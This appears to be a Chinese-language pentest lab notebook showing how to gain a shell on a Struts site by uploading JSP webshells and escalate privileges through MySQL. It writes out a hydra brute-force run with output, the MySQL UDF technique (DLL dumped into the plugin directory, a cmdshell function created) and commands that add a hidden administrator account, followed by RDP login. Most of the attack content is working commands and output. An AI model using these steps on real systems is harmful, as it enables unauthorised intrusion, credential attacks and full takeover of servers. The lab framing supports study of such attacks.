0428
0x01 struts getshell
1.1 寻找带 .action 的URL
1.2 在url中设法出现url
1.3 把URL进工具,点第三个漏洞,获取信息
1.4 执行命令
1.5 将测试test.txt 小马one.8.jsp cmd马k8cmd.jsp 大马css.jsp 依次上传
1.6 结果,发现test.txt one8.jsp k8cmd.jsp成功上传 css.jsp不成功,寻找另外的方法
1.7 连接小马,将菜刀马代码放入内容框,点 上传代码 按钮
1.8 验证文件成功上传
1.9 上菜刀
0x02 利用允许远程连接的mysql提权
2.1 在victim新建n00p用户,并授予远程连接权限
CREATE USER 'n00p'@'localhost' IDENTIFIED BY 'n00p';
GRANT ALL PRIVILEGES ON *.* TO 'n00p'@'%' IDENTIFIED BY 'n00p' WITH GRANT OPTION;
FLUSH PRIVILEGES;2.2 在kali自制字典
root@kali:~/dock# cat user.txt
root
n00p
root@kali:~/dock# cat pass.txt
root
n00p
2.3 利用hydra爆破成功
··· bash
root@kali:~/dock# hydra vic mysql -L user.txt -P pass.txt -V
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2018-04-27 23:23:55
[INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections)
[DATA] max 4 tasks per 1 server, overall 4 tasks, 4 login tries (l:2/p:2), ~1 try per task
[DATA] attacking mysql://vic:3306/
[ATTEMPT] target vic - login "root" - pass "root" - 1 of 4 [child 0] (0/0)
[ATTEMPT] target vic - login "root" - pass "n00p" - 2 of 4 [child 1] (0/0)
[ATTEMPT] target vic - login "n00p" - pass "root" - 3 of 4 [child 2] (0/0)
[ATTEMPT] target vic - login "n00p" - pass "n00p" - 4 of 4 [child 3] (0/0)
[3306][mysql] host: vic login: n00p password: n00p
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2018-04-27 23:23:55
```
2.4 利用mysql客户端进行连接,这里用的是navicat
2.5 右键此连接,console,输入 set @my_udf_a=concat('',dll的16进制);
mysql> use mysql;
Database changed
mysql> set @my_udf_a=concat('', 此处限于篇幅省略);
Query OK, 0 rows affected (0.00 sec)2.6 建表my_udf_data,字段为data,类型为longblob
mysql> create table my_udf_data(data LONGBLOB);
Query OK, 0 rows affected (0.08 sec)2.7 将my_udf_data表更新为@my_udf_a中的数据
mysql> insert into my_udf_data values("");
Query OK, 1 row affected (0.00 sec)
### 2.8 mysql> update my_udf_data set data = @my_udf_a;
Query OK, 1 row affected (0.00 sec)
Rows matched: 1 Changed: 1 Warnings: 02.9 查看dll导出路径
Mysql<5.0,导出路径随意;
5.0<=mysql<5.1,则需要导出至目标服务器的系统目录(如:system32),否则在下一步操作中你会看到“No paths allowed for shared library”错误;
mysql>5.1,需要导出dll到插件路径,插件路径可以用下面这条命令查看:show variables like '%plugin%';mysql> select @@version;
+-----------+
| @@version |
+-----------+
| 5.5.53 |
+-----------+
1 row in set (0.01 sec)
mysql> show variables like '%plugin%';
+---------------+-------------------------------------------+
| Variable_name | Value |
+---------------+-------------------------------------------+
| plugin_dir | C:\phpStudy\PHPTutorial\MySQL\lib\plugin\ |
+---------------+-------------------------------------------+
1 row in set (0.01 sec)2.10 将dll导出
这一步遇到了plugin文件夹不存在的问题,因为是测试用,所以 手动从目标机器建立plugin文件夹
mysql> select data from my_udf_data into DUMPFILE 'C:\phpStudy\PHPTutorial\MySQL\lib\plugin\n00p.dll';
1 - Can't create/write to file 'C:phpStudyPHPTutorialMySQLlibplugin
00p.dll' (Errcode: 22)
mysql> select data from my_udf_data into DUMPFILE 'C:/phpStudy/PHPTutorial/MySQL/lib/plugin/n00p.dll';
Query OK, 1 row affected (0.00 sec)由以上代码块可知,路径中单反斜杠不起作用,需转换成单正斜杠,或者双反斜杠
2.11 创建cmdshell function
mysql> create function cmdshell returns string soname 'n00p.dll';
Query OK, 0 rows affected (0.08 sec)2.12 通过cmdshell function进行提权
这里不知为何乱码,但可以确定命令被执行,等会可以验证是否执行成功
mysql> select cmdshell('net user n00p n00p /add');
+----------------------------------------------------------+
| cmdshell('net user n00p n00p /add') |
+----------------------------------------------------------+
| ����ɹ���ɡ�
--------------------------------------------���!
|
+----------------------------------------------------------+
1 row in set (0.41 sec)
mysql> select cmdshell('net localgroup administrators n00p /add');
+----------------------------------------------------------+
| cmdshell('net localgroup administrators n00p /add') |
+----------------------------------------------------------+
| ����ɹ���ɡ�
--------------------------------------------���!
|
+----------------------------------------------------------+
1 row in set (0.05 sec)2.13 发现目标机器开启了3389端口,登录验证,成功!
0x03 利用大马dama.php加udf.php提权不允许远程连接的mysql
3.1 改变测试环境:
目标机切换Apache为服务方式运行,并添加低权限用户,为该用户添加日志文件读写权限
3.2 假设此站有文件上传漏洞,则上传一个大马,并用大马上传udf.php
3.3 url访问udf.php,填入mysql连接信息
3.4 利用大马查看plugin目录
3.5 访问udf.php,将目录信息填入,同时点击到处到此目录:
此处用的双反斜杠,同时改变html元素的width属性,使得输入框能显示完整路径
3.6 使用SQL语句创建功能函数:
3.7 现在可以在SQL命令输入框内执行功能函数了,以下操作同0x02后半部分,不再赘述。
优质内容筛选与推荐>>1、2018.08.10 css中position定位问题
2、SaaS多租户模式数据存储方案
3、图片自动缩放 js图片缩放
4、按照层次序列创建二叉树,并判断二叉树是否为二叉搜索树
5、MySQL--产品的起源和状态